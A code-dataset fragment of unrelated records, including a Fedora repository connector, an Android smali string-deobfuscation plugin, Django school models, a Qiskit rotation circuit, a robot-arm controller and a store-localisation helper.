URL.\n\n @eturn (string) New datasteram URI if a new one is crated.\n '''\n\n cherrypy.log('Creating an externally referenced node: ' + uri)\n # Check that external reference exists\n check = self.request('head',ref, headers=self.headers)\n check.raise_for_status()\n\n res = self.request('put',\n uri,\n headers = dict(chain(\n self.headers.items(),\n [('content-type', 'message/external-body; access-type=URL; URL=\"{}\"'.format(ref))]\n ))\n )\n res.raise_for_status()\n\n #cherrypy.log('Create/update datastream response:' + str(res.status_code))\n\n if 'location' in res.headers:\n return res.headers['location']\n\n\n def update_node_properties(self, uri, delete_props=[], insert_props=[], where_props=[]):\n '''Update the properties of an existing node from a set of insert, delete\n and where tuples formatted by Node::_build_prop_tuples .\n\n @param uri (string) Node URI.\n @param delete_props (dict) Properties to be deleted.\n If the value of a property is a tuple or a list, thespecific value(s) will be deleted.\n If it is an empty string (\"\"), the whole property and its values are deleted.\n @param insert_props (dict) Properties to be inserted.\n Keys are property names, values are tuples or lists of values.\n Non-empty string can be used as single values.\n @param where_props (dict) Conditions. Same syntax as @p insert_props.\n\n @return (boolean) True on success.\n '''\n if not delete_props and not insert_props:\n cherrypy.log('Not received any properties to update.')\n return False\n\n cherrypy.log(\"URI: {}\\nDelete props: {}\\nInsert props: {}\\nwhere props: {}\".format(\n uri, delete_props, insert_props, where_props\n ))\n insert_triples, delete_triples = ('','')\n where_triples_list = [];\n\n for d in delete_props:\n delete_triples += '\\n\\t<> {} {} .'.format(d[0].n3(), d[1].n3())\n\n for i in insert_props:\n insert_triples += '\\n\\t<> {} {} .'.format(i[0].n3(), i[1].n3())\n\n for w in where_props:\n where_triples_list.append('\\n\\t{{<> {} {}}}'.\\\n format(w[0].n3(), w[1].n3()))\n where_triples = '\\n\\tUNION'.join(where_triples_list)\n\n body = 'DELETE {{{}\\n}} INSERT {{{}\\n}} WHERE {{{}\\n}}'\\\n .format(delete_triples, insert_triples, where_triples)\n cherrypy.log.error('Executing SPARQL update: ' + body)\n\n res = self.request('patch',\n uri,\n data = body.encode('utf-8'),\n headers = dict(chain(self.headers.items(),\n [('Content-type', 'application/sparql-update')]\n ))\n )\n #if res.status_code > 399:\n # cherrypy.log('HTTP Error: {}'.format(res.text))\n res.raise_for_status()\n\n return True\n\n\n def commit_transaction(self, tx_uri):\n '''Commit an open transaction.\n\n @param tx_uri The full transaction URI.\n\n @return (boolean) True on success.\n '''\n cherrypy.log.error('Committing transaction: {}'.\\\n format(tx_uri.split('tx:')[-1]))\n res = self.request('post',\n tx_uri + '/fcr:tx/fcr:commit',\n headers=self.headers\n )\n res.raise_for_status()\n\n return True\n\n\n def rollback_transaction(self, tx_uri):\n '''Roll back an open transaction.\n\n @param tx_uri The full transaction URI.\n\n @return (boolean) True on success.\n '''\n cherrypy.log.error('Rolling back transaction: {}'.\\\n format(tx_uri.split('tx:')[-1]))\n res = self.request('post',\n tx_uri + '/fcr:tx/fcr:rollback',\n headers=self.headers\n )\n res.raise_for_status()\n\n return True\n\n","sub_path":"combine/connectors/lake_connector.py","file_name":"lake_connector.py","file_ext":"py","file_size_in_byte":13959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"444980604","text":"# coding:utf-8\r\n'''\r\n 插件的功能:\r\n\r\n 1. 根据正则表达式匹配,需要解密的区域\r\n 2. 将代码区解析为,类、方法、参数\r\n [{'className':'', 'methodName':'', 'arguments':'', 'id':''}]\r\n 3. 生成json格式,增加区域ID(Hash)\r\n\r\n'''\r\n\r\nfrom json import JSONEncoder\r\nimport tempfile\r\nimport os\r\nimport hashlib\r\nimport re\r\n\r\n\r\nclass Plugin(object):\r\n name = 'Plugin'\r\n description = ''\r\n version = ''\r\n\r\n # const/16 v2, 0x1a\r\n CONST_NUMBER = 'const(?:\\/\\d+) [vp]\\d+, (-?0x[a-f\\d]+)\\s+'\r\n # ESCAPE_STRING = '''\"(.*?)(?([^\\(]+\\(%s\\))Ljava/lang/String;\\s+' % args\r\n\r\n def get_class_name(self, line):\r\n start = line.index('}, L')\r\n end = line.index(';->')\r\n return line[start + 4:end].replace('/', '.')\r\n\r\n def get_method_name(self, line):\r\n end = line.index(';->')\r\n args_index = line.index('(')\r\n return line[end + 3:args_index]\r\n\r\n def get_clz_mtd_name(self, line):\r\n clz_name, mtd_name = re.search('invoke-static.*?{.*?}, (.*?);->(.*?)\\(.*?\\)Ljava/lang/String;', line).groups()\r\n clz_name = clz_name[1:].replace('/', '.')\r\n return (clz_name, mtd_name)\r\n\r\n def get_clz_mtd_rtn_name(self, line):\r\n '''\r\n class_name, method_name, return_variable_name\r\n '''\r\n clz_name, mtd_name = re.search('invoke-static.*?{.*?}, (.*?);->(.*?)\\(.*?\\)Ljava/lang/String;', line).groups()\r\n clz_name = clz_name[1:].replace('/', '.')\r\n\r\n prog = re.compile(self.MOVE_RESULT_OBJECT)\r\n mro_statement = prog.search(line).group()\r\n rtn_name = mro_statement[mro_statement.rindex(' ') + 1:]\r\n return (clz_name, mtd_name, rtn_name)\r\n\r\n def get_arguments(self, mtd_body, line, proto):\r\n '''\r\n 获取参数\r\n '''\r\n args = []\r\n if proto == '[B':\r\n ptn1 = re.compile(':array_[\\w\\d]+')\r\n array_data_name = ptn1.search(line).group()\r\n ptn2 = re.compile('\\s+' + array_data_name + '\\s+.array-data 1\\s+' + '[\\w\\s]+' + '.end array-data')\r\n\r\n result = ptn2.search(mtd_body)\r\n if result:\r\n array_data_context = result.group()\r\n byte_arr = []\r\n for item in array_data_context.split()[3:-2]:\r\n byte_arr.append(eval(item[:-1]))\r\n args.append(proto + ':' + str(byte_arr))\r\n elif proto == '[I':\r\n ptn1 = re.compile(':array_[\\w\\d]+')\r\n array_data_name = ptn1.search(line).group()\r\n ptn2 = re.compile('\\s+' + array_data_name + '\\s+.array-data \\d\\s+' + '[-\\w\\s]+' + '.end array-data')\r\n\r\n result = ptn2.search(mtd_body)\r\n if result:\r\n array_data_context = result.group()\r\n byte_arr = []\r\n for item in array_data_context.split()[3:-2]:\r\n byte_arr.append(eval(item))\r\n args.append(proto + ':' + str(byte_arr))\r\n elif proto == 'java.lang.String':\r\n const_str = re.findall(\"\\\".+\", line)[-1]\r\n arg1 = []\r\n for item in const_str[1:-1].encode(\"UTF-8\"):\r\n arg1.append(item)\r\n args.append(\"java.lang.String:\" + str(arg1))\r\n elif proto in ['I', 'II', 'III']:\r\n prog2 = re.compile(self.CONST_NUMBER)\r\n args = []\r\n for item in prog2.finditer(line):\r\n cn = item.group().split(\", \")\r\n args.append('I:' + str(eval(cn[1].strip())))\r\n return args\r\n\r\n def get_return_variable_name(self, line):\r\n p3 = re.compile(self.MOVE_RESULT_OBJECT)\r\n mro_statement = p3.search(line).group()\r\n return mro_statement[mro_statement.rindex(' ') + 1:]\r\n\r\n def get_json_item(self, cls_name, mtd_name, args):\r\n '''\r\n 生产解密目标\r\n '''\r\n item = {'className': cls_name, 'methodName': mtd_name, 'arguments': args}\r\n ID = hashlib.sha256(JSONEncoder().encode(item).encode('utf-8')).hexdigest()\r\n item['id'] = ID\r\n return item\r\n\r\n\r\n def append_json_item(self, json_item, mtd, line, return_variable_name):\r\n '''\r\n 添加到json_list, target_contexts\r\n '''\r\n mid = json_item['id']\r\n if mid not in self.target_contexts.keys():\r\n self.target_contexts[mid] = [(mtd, line, '\\n\\n const-string %s, ' % return_variable_name)]\r\n else:\r\n self.target_contexts[mid].append((mtd, line, '\\n\\n const-string %s, ' % return_variable_name))\r\n\r\n if json_item not in self.json_list:\r\n self.json_list.append(json_item)\r\n\r\n\r\n def __init__(self, driver, methods, smali_files):\r\n self.make_changes = False\r\n self.driver = driver\r\n self.methods = methods\r\n self.smali_files = smali_files\r\n\r\n def run(self):\r\n '''\r\n 匹配代码,生成指定格式的文件(包含类名、方法、参数)\r\n '''\r\n pass\r\n\r\n def optimize(self):\r\n '''\r\n 重复的代码,考虑去除\r\n 生成json\r\n 生成驱动解密\r\n 更新内存\r\n 写入文件\r\n '''\r\n if not self.json_list or not self.target_contexts:\r\n return\r\n\r\n jsons = JSONEncoder().encode(self.json_list)\r\n\r\n with tempfile.NamedTemporaryFile(mode='w+', delete=False) as fp:\r\n fp.write(jsons)\r\n outputs = self.driver.decode(fp.name)\r\n os.unlink(fp.name)\r\n\r\n # 替换内存\r\n # output 存放的是解密后的结果。\r\n for key in outputs:\r\n if 'success' in outputs[key]:\r\n if key not in self.target_contexts.keys():\r\n print('not found', key)\r\n continue\r\n for item in self.target_contexts[key]:\r\n old_body = item[0].body\r\n target_context = item[1]\r\n new_context = item[2] + outputs[key][1]\r\n\r\n # It's not a string.\r\n if 'null' == outputs[key][1]:\r\n continue\r\n item[0].body = old_body.replace(target_context, new_context)\r\n item[0].modified = True\r\n self.make_changes = True\r\n\r\n self.smali_files_update()\r\n\r\n def optimizations(self, json_list, target_contexts):\r\n '''\r\n 重复的代码,考虑去除\r\n 生成json\r\n 生成驱动解密\r\n 更新内存\r\n 写入文件\r\n '''\r\n if not json_list or not target_contexts:\r\n return\r\n\r\n jsons = JSONEncoder().encode(json_list)\r\n\r\n with tempfile.NamedTemporaryFile(mode='w+', delete=False) as fp:\r\n fp.write(jsons)\r\n outputs = self.driver.decode(fp.name)\r\n os.unlink(fp.name)\r\n\r\n # print(outputs)\r\n\r\n # 替换内存\r\n # output 存放的是解密后的结果。\r\n for key in outputs:\r\n if 'success' in outputs[key]:\r\n if key not in target_contexts.keys():\r\n print('not found', key)\r\n continue\r\n for item in target_contexts[key]:\r\n old_body = item[0].body\r\n target_context = item[1]\r\n new_context = item[2] + outputs[key][1]\r\n\r\n # It's not a string.\r\n if 'null' == outputs[key][1]:\r\n continue\r\n item[0].body = old_body.replace(target_context, new_context)\r\n item[0].modified = True\r\n self.make_changes = True\r\n\r\n self.smali_files_update()\r\n\r\n def smali_files_update(self):\r\n '''\r\n write changes to smali files\r\n '''\r\n if self.make_changes:\r\n for smali_file in self.smali_files:\r\n smali_file.update()\r\n","sub_path":"libs/dexsim/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":8997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"229731492","text":"from django.db import models\nfrom common.models import SaveDeleteMixin, checkRequiredFieldsNotNone\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\n\nimport re\n\n# **********MODELS**********\n\nclass School(SaveDeleteMixin, models.Model):\n # Foreign keys\n # Creation and update time\n creationDateTime = models.DateTimeField('Creation date',auto_now_add=True)\n updatedDateTime = models.DateTimeField('Last modified date',auto_now=True)\n # Fields\n name = models.CharField('Name', max_length=100, unique=True)\n abbreviation = models.CharField('Abbreviation', max_length=5, unique=True, help_text=\"Abbreviation is used in the schedule and scoring system\")\n # Details\n state = models.ForeignKey('regions.State', verbose_name='State', on_delete=models.PROTECT, null=True, limit_choices_to={'typeRegistration': True}) # Needed because null on initial data import\n region = models.ForeignKey('regions.Region', verbose_name='Region', on_delete=models.PROTECT, null=True)\n postcode = models.CharField('Postcode', max_length=4, null=True, blank=True)\n # Flags\n forceSchoolDetailsUpdate = models.BooleanField('Force details update', default=False)\n\n # *****Meta and clean*****\n class Meta:\n verbose_name = 'School'\n ordering = ['name']\n\n def clean(self):\n errors = []\n\n # Check min length of abbreviation\n if not self.abbreviation or len(self.abbreviation) < 3:\n errors.append(ValidationError('Abbreviation must be at least three characters'))\n\n # Case insenstive abbreviation and name unique check\n if School.objects.filter(name__iexact=self.name).exclude(pk=self.pk).exists():\n errors.append(ValidationError('School with this name exists. Please ask your school administrator to add you.'))\n\n if School.objects.filter(abbreviation__iexact=self.abbreviation).exclude(pk=self.pk).exists():\n errors.append(ValidationError('School with this abbreviation exists. Please ask your school administrator to add you.'))\n\n # Validate school not using name or abbreviation reserved for independent entries\n if self.abbreviation.upper() == 'IND':\n errors.append(ValidationError('IND is reserved for independent entries. If you are an independent entry, you do not need to create a school.'))\n\n # TODO: use regex to catch similar\n if self.name.upper() == 'INDEPENDENT':\n errors.append(ValidationError('Independent is reserved for independent entries. If you are an independent entry, you do not need to create a school.'))\n\n # Validate postcode\n if self.postcode is not None:\n if not re.match(r\"(^[0-9]+$)\", self.postcode):\n errors.append(ValidationError('Postcode must be numeric'))\n\n if len(self.postcode) < 4:\n errors.append(ValidationError('Postcode too short'))\n\n # Validate region state\n if self.region and self.region.state is not None and self.region.state != self.state:\n errors.append(ValidationError(\"Region not valid for selected state\"))\n\n # Raise any errors\n if errors:\n raise ValidationError(errors)\n\n # *****Permissions*****\n @classmethod\n def stateCoordinatorPermissions(cls, level):\n if level in ['full', 'schoolmanager']:\n return [\n 'add',\n 'view',\n 'change',\n 'delete'\n ]\n elif level in ['viewall', 'billingmanager', 'eventmanager']:\n return [\n 'view',\n ]\n \n return []\n\n # Used in state coordinator permission checking\n def getState(self):\n return self.state\n\n # *****Save & Delete Methods*****\n\n def preSave(self):\n self.abbreviation = self.abbreviation.upper()\n\n # *****Methods*****\n\n # *****Get Methods*****\n\n def __str__(self):\n return self.name\n\n # *****CSV export methods*****\n\n # *****Email methods*****\n\nclass Campus(models.Model):\n # Foreign keys\n school = models.ForeignKey(School, verbose_name='School', on_delete=models.CASCADE)\n # Creation and update time\n creationDateTime = models.DateTimeField('Creation date',auto_now_add=True)\n updatedDateTime = models.DateTimeField('Last modified date',auto_now=True)\n # Fields\n name = models.CharField('Name', max_length=100)\n postcode = models.CharField('Postcode', max_length=4, null=True, blank=True)\n\n # *****Meta and clean*****\n class Meta:\n verbose_name = 'Campus'\n verbose_name_plural = 'Campuses'\n ordering = ['school', 'name']\n unique_together = ('school', 'name')\n\n def clean(self):\n errors = []\n\n # Validate postcode\n if self.postcode is not None:\n if not re.match(r\"(^[0-9]+$)\", self.postcode):\n errors.append(ValidationError('Postcode must be numeric'))\n\n if len(self.postcode) < 4:\n errors.append(ValidationError('Postcode too short'))\n\n # Raise any errors\n if errors:\n raise ValidationError(errors)\n\n # *****Permissions*****\n @classmethod\n def stateCoordinatorPermissions(cls, level):\n return School.stateCoordinatorPermissions(level)\n\n # Used in state coordinator permission checking\n def getState(self):\n return self.school.state\n\n # *****Save & Delete Methods*****\n\n # *****Methods*****\n\n # *****Get Methods*****\n\n def __str__(self):\n return f'{self.name}'\n\n # *****CSV export methods*****\n\n # *****Email methods***** \n\nclass SchoolAdministrator(SaveDeleteMixin, models.Model):\n # Foreign keys\n school = models.ForeignKey(School, verbose_name='School', on_delete=models.CASCADE)\n campus = models.ForeignKey(Campus, verbose_name='Campus', on_delete=models.SET_NULL, null=True, blank=True)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name='User', on_delete=models.PROTECT)\n # Creation and update time\n creationDateTime = models.DateTimeField('Creation date',auto_now_add=True)\n updatedDateTime = models.DateTimeField('Last modified date',auto_now=True)\n # Fields\n\n # *****Meta and clean*****\n class Meta:\n verbose_name = 'School administrator'\n unique_together = ('school', 'user')\n ordering = ['user']\n\n def clean(self):\n checkRequiredFieldsNotNone(self, ['school', 'user'])\n # Check campus school matches school on this object\n if self.campus and self.campus.school != self.school:\n raise(ValidationError('Campus school must match school'))\n\n # *****Permissions*****\n @classmethod\n def stateCoordinatorPermissions(cls, level):\n return School.stateCoordinatorPermissions(level)\n\n # Used in state coordinator permission checking\n def getState(self):\n return self.school.state\n\n # *****Save & Delete Methods*****\n\n def preSave(self):\n if self.pk:\n self.previousUser = SchoolAdministrator.objects.get(pk=self.pk).user\n self.previousSchool = SchoolAdministrator.objects.get(pk=self.pk).school\n\n def postSave(self):\n # Set currently selected school if not set\n if self.user.currentlySelectedSchool is None or (hasattr(self, 'previousSchool') and self.user.currentlySelectedSchool == self.previousSchool):\n self.user.currentlySelectedSchool = self.school\n self.user.save(update_fields=['currentlySelectedSchool'])\n\n if hasattr(self, 'previousUser') and self.user != self.previousUser:\n self.previousUser.setCurrentlySelectedSchool()\n\n # *****Methods*****\n\n # *****Get Methods*****\n\n def userName(self):\n return self.user.fullname_or_email()\n userName.short_description = 'User'\n userName.admin_order_field = 'user'\n\n def userEmail(self):\n return self.user.email\n userEmail.short_description = 'User email'\n userEmail.admin_order_field = 'user__email'\n\n def __str__(self):\n return f'{self.school}: {self.user.fullname_or_email()}'\n\n # *****CSV export methods*****\n\n # *****Email methods*****\n","sub_path":"rcjaRegistration/schools/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"336265221","text":"\"\"\" \n\nContext : SRP\nModule : Pipeline.py\nVersion : 1.0.0\nAuthor : Stefano Covino\nDate : 20/11/2010\nE-mail : stefano.covino@brera.inaf.it\nURL: : http://www.merate.mi.astro.it/utenti/covino\n\nUsage : to be imported\n\nRemarks :\n\nHistory : (20/11/2010) First version.\n\n\"\"\"\n\n\n\n\ndef LoadProcessPointFName (fname):\n value = None\n try:\n f = open(fname)\n dt = f.readlines()\n f.close()\n except IOError:\n return None\n #\n try:\n valueross = int(dt[0].split()[0])\n valueremir = int(dt[0].split()[1])\n except (ValueError, IndexError):\n return None\n #\n return valueross,valueremir\n","sub_path":"python/SRPAstro/SRP.SRPPipelines.REM/build/lib/SRP/SRPPipelines/REM/LoadProcessPointFName.py","file_name":"LoadProcessPointFName.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"276440679","text":"from xml.etree import ElementTree\nimport re\nimport json\nimport os\n\n\ndef read_docs(path) -> str:\n with open(path) as f:\n raw = f.read()\n raw = f\"{raw}\"\n return raw\n\n\ndef parse_doc(xml: str) -> None:\n xml = re.sub('', '', xml).strip()\n xml = re.sub('&[^>]*;', ' ', xml).strip()\n\n docs = []\n\n root = ElementTree.fromstring(xml)\n doc: ElementTree.Element\n for doc in root:\n doc_id = doc.find('DOCNO').text.strip()\n text = ''\n try:\n # LA\n text = \"\".join(doc.find('TEXT').itertext()).strip()\n except AttributeError:\n pass\n\n docs.append(\n {doc_id: text}\n )\n\n with open('./index_pre/' + doc_id, 'w', encoding='utf-8') as f:\n json.dump(docs, f, ensure_ascii=False, indent=4)\n\n\nif __name__ == '__main__':\n p = './disk5/LATIMES/LA/'\n for fp in os.listdir(p):\n if fp.startswith(\"LA\"):\n print(f'processing {fp}')\n parse_doc(read_docs(p + fp))\n\n\n\n\n\n\n","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"188141903","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2018 IBM.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# =============================================================================\nfrom qiskit.aqua.utils import CircuitFactory\nfrom qiskit.aqua.circuits.gates import cry\nimport numpy as np\n\n\nclass LinearYRotation(CircuitFactory):\n \"\"\"\n Linearly-controlled Y rotation.\n For a register of state qubits |x> and a target qubit |0> this operator acts as:\n\n |x>|0> --> |x>( cos(slope * x + offset)|0> + sin(slope * x + offset)|1> )\n\n \"\"\"\n\n def __init__(self, slope, offset, num_state_qubits, i_state=None, i_target=None):\n \"\"\"\n Constructor.\n\n Construct linear Y rotation circuit factory\n Args:\n slope (float): slope of the controlled rotation\n offset (float): offset of the controlled rotation\n num_state_qubits (int): number of qubits representing the state\n i_state (array or list): indices of the state qubits (least significant to most significant)\n i_target (int): index of target qubit\n \"\"\"\n\n super().__init__(num_state_qubits + 1)\n\n # store parameters\n self.num_control_qubits = num_state_qubits\n self.slope = slope\n self.offset = offset\n\n self.i_state = None\n if i_state is not None:\n self.i_state = i_state\n else:\n self.i_state = range(num_state_qubits)\n\n self.i_target = None\n if i_target is not None:\n self.i_target = i_target\n else:\n self.i_target = num_state_qubits\n\n def build(self, qc, q, q_ancillas=None):\n\n # get indices\n i_state = self.i_state\n i_target = self.i_target\n\n # apply linear rotation\n if not np.isclose(self.offset / 4 / np.pi % 1, 0):\n qc.ry(self.offset, q[i_target])\n for i, j in enumerate(i_state):\n theta = self.slope * pow(2, i)\n if not np.isclose(theta / 4 / np.pi % 1, 0):\n qc.cry(self.slope * pow(2, i), q[j], q[i_target])\n","sub_path":"qiskit/aqua/circuits/linear_y_rotation.py","file_name":"linear_y_rotation.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"101965882","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/9 17:48\n# @Author : StalloneYang\n# @File : urls.py\n# @desc:\n\nfrom django.conf.urls import url\nfrom django.urls import include\n\nfrom . import views\n\nurlpatterns = [\n url(r'^register/$',views.register),\n url(r'^register_handle/$',views.register_handle),\n url(r'^login/$',views.login),\n url(r'^login_handle/$',views.login_handle),\n url(r'^uname_exist/$',views.uname_exist),\n url(r'^info/$',views.info),\n url(r'^order(\\d*)/$',views.order),\n url(r'^site/$',views.site),\n url(r'^logout/$',views.logout),\n]\n\n","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"290062603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 10 23:49:30 2019\n\n@author: Ahmed\n\nThe class used to controll the arm (real one or simulated with Bras.py) using neuroGraph decisions\n\"\"\"\n\nimport tkinter as tk\nimport time\nfrom bras import Bras\nfrom pygame import mixer\nfrom arduino import Arduino\n\ndef funcInc(n):\n return 0.12*n/(15 + n)\n\nclass Controlleur(tk.Frame):\n def __init__(self, master):\n tk.Frame.__init__(self, master)\n self.bras = Bras(self)\n self.bras.grid(row = 2, column = 0, columnspan = 10)\n \n self.decider = None\n \n self.buttonMove = tk.Button(self, text = 'move', command = self.move, repeatinterval = 20, repeatdelay = 200)\n self.buttonMove.grid(row = 3, column = 0)\n \n self.buttonNext = tk.Button(self, text = 'attraper', command = self.attraper, repeatinterval = 20, repeatdelay = 500)\n self.buttonNext.grid(row = 3, column = 1)\n \n self.buttonSens = tk.Button(self, text = 'ouvrir', command = self.ouvrir, repeatinterval = 20, repeatdelay = 500)\n self.buttonSens.grid(row = 3, column = 2)\n \n self.state = None\n self.resetTimer = 2.5\n self.changeTime = time.time()\n \n mixer.init()\n self.sound = mixer.Sound(\"obj/pat.wav\")\n \n self.sens = 1\n self.n = 0\n \n self.bras.info = \"Calcule : attraper\\nMouvement : mouvement\"\n self.bras.nextArt()\n \n def setDecider(self, decider):\n self.decider = decider\n self.decider.grid(row = 0, column = 0, columnspan = 10)\n \n def appendData(self, x, y):\n self.decider.appendData(x, y)\n if self.isBlocked():\n return\n if self.decider.getState() == 1:\n self.attraper()\n time.sleep(1)\n self.ouvrir()\n elif self.decider.getState() == -1:\n self.move()\n else:\n self.n = 0\n \n def move(self):\n self.n += 1\n self.bras.increment = funcInc(self.n)*self.sens\n self.bras.move()\n \n def nextArt(self):\n self.bras.nextArt()\n self.changeTime = time.time()\n \n def swapSens(self):\n self.sens *= -1\n \n def isBlocked(self):\n return time.time() - self.changeTime < self.resetTimer\n \n def attraper(self):\n self.changeTime = time.time()\n self.sound.play()\n self.bras.attraper()\n \n def ouvrir(self):\n self.bras.ouvrir()\n \n#de 0 à 180 -> déplacement du coude\n#181 = ouverture, 182 = fermeture\nclass ArduinoControl(Controlleur):\n def __init__(self, master, port):\n Controlleur.__init__(self, master)\n self.arduino = Arduino(\"COM3\")\n \n def move(self):\n Controlleur.move(self)\n #gestion du sens \n if self.bras.coude_o < 0:\n self.bras.coude_o = 0\n self.swapSens()\n if self.bras.coude_o > 3.14:\n self.bras.coude_o = 3.14\n self.swapSens()\n self.arduino.sendInt(int(self.bras.coude_o*180/3.1416))\n \n def attraper(self):\n Controlleur.attraper(self)\n self.arduino.sendInt(182)\n \n def ouvrir(self):\n Controlleur.ouvrir(self)\n self.arduino.sendInt(181)\n \n \n \n \n \n \n \n \n \n \n ","sub_path":"controlleur.py","file_name":"controlleur.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"256075107","text":"import logging\n\nfrom voluptuous import Schema, Required, Optional, MultipleInvalid\n\nfrom mozapkpublisher.common import utils\nfrom mozapkpublisher.common.exceptions import NoTranslationGiven, TranslationMissingData\n\nlogger = logging.getLogger(__name__)\n\n# TODO: receive these options on the CLI, rather than hard-coding this mapping here in mozapkpublisher\nSTORE_PRODUCT_DETAILS_PER_PACKAGE_NAME = {\n 'org.mozilla.fennec_aurora': {\n 'product': 'fx_android',\n # Due to project Dawn, Nightly is now using the Aurora package name.\n # See https://bugzilla.mozilla.org/show_bug.cgi?id=1357351\n 'channel': 'nightly',\n },\n 'org.mozilla.firefox_beta': {\n 'product': 'fx_android',\n 'channel': 'beta',\n },\n 'org.mozilla.firefox': {\n 'product': 'fx_android',\n 'channel': 'release',\n },\n 'org.mozilla.focus': {\n 'product': 'focus_android',\n 'channel': 'release',\n },\n 'org.mozilla.klar': {\n 'product': 'klar_android',\n 'channel': 'release',\n }\n}\n\n# API documentation: https://l10n.mozilla-community.org/stores_l10n/documentation/\nL10N_API_URL = 'https://l10n.mozilla-community.org/stores_l10n/api/v1'\n_ALL_LOCALES_URL = L10N_API_URL + '/{product}/listing/{channel}/'\n_LOCALE_URL = L10N_API_URL + '/{product}/translation/{channel}/{locale}/'\n_MAPPING_URL = L10N_API_URL + '/google/localesmapping/?reverse'\n\n# Because these scripts are meant to run and exit, we cache the stores_l10n results\n# in these globals\n_translations_per_google_play_locale_code = None\n_mappings = None\n\nTRANSLATION_SCHEMA = Schema({\n Required('long_desc'): str,\n Required('short_desc'): str,\n Required('title'): str,\n Optional('whatsnew'): str,\n})\n\n\ndef get_translations_per_google_play_locale_code(package_name, moz_locales=None):\n product_details = STORE_PRODUCT_DETAILS_PER_PACKAGE_NAME[package_name]\n product = product_details['product']\n channel = product_details['channel']\n\n global _translations_per_google_play_locale_code\n\n _init_full_locales_if_needed(product, channel)\n\n translations = _translations_per_google_play_locale_code if moz_locales is None else {\n _translate_moz_locate_into_google_play_one(moz_locale):\n _translations_per_google_play_locale_code[\n _translate_moz_locate_into_google_play_one(moz_locale)\n ]\n for moz_locale in moz_locales\n }\n\n check_translations_schema(translations)\n return translations\n\n\ndef check_translations_schema(translations):\n if not translations:\n raise NoTranslationGiven(translations)\n\n for locale, translation in translations.items():\n try:\n TRANSLATION_SCHEMA(translation)\n except MultipleInvalid as e:\n raise TranslationMissingData(locale, e)\n\n\ndef _init_full_locales_if_needed(product, channel):\n global _translations_per_google_play_locale_code\n\n if _translations_per_google_play_locale_code is None:\n moz_locales = _get_list_of_completed_locales(product, channel)\n moz_locales.append(u'en-US')\n\n logger.info('Downloading {} locales: {}...'.format(\n len(moz_locales), moz_locales\n ))\n _translations_per_google_play_locale_code = {\n _translate_moz_locate_into_google_play_one(moz_locale):\n _get_translation(product, channel, moz_locale)\n for moz_locale in moz_locales\n }\n logger.info('Locales downloaded and converted to: {}'.format(\n _translations_per_google_play_locale_code.keys()\n ))\n\n\ndef _get_list_of_completed_locales(product, channel):\n \"\"\" Get all the translated locales supported by Google play\n So, locale unsupported by Google play won't be downloaded\n Idem for not translated locale\n \"\"\"\n return utils.load_json_url(_ALL_LOCALES_URL.format(product=product, channel=channel))\n\n\ndef _get_translation(product, channel, locale):\n return utils.load_json_url(_LOCALE_URL.format(product=product, channel=channel, locale=locale))\n\n\ndef _translate_moz_locate_into_google_play_one(locale):\n global _mappings\n if _mappings is None:\n _mappings = utils.load_json_url(_MAPPING_URL)\n\n return _mappings[locale] if locale in _mappings else locale\n","sub_path":"mozapkpublisher/common/store_l10n.py","file_name":"store_l10n.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"326260613","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pkg_resources\nimport grpc_gcp\n\nimport google.api_core.grpc_helpers\n\nfrom google.cloud.spanner_v1.proto import spanner_pb2_grpc\n\n\n_SPANNER_GRPC_CONFIG = 'spanner.grpc.config'\n\n\nclass SpannerGrpcTransport(object):\n \"\"\"gRPC transport class providing stubs for\n google.spanner.v1 Spanner API.\n\n The transport provides access to the raw gRPC stubs,\n which can be used to take advantage of advanced\n features of gRPC.\n \"\"\"\n # The scopes needed to make gRPC calls to all of the methods defined\n # in this service.\n _OAUTH_SCOPES = (\n 'https://www.googleapis.com/auth/cloud-platform',\n 'https://www.googleapis.com/auth/spanner.data',\n )\n\n def __init__(self,\n channel=None,\n credentials=None,\n address='spanner.googleapis.com:443'):\n \"\"\"Instantiate the transport class.\n\n Args:\n channel (grpc.Channel): A ``Channel`` instance through\n which to make calls. This argument is mutually exclusive\n with ``credentials``; 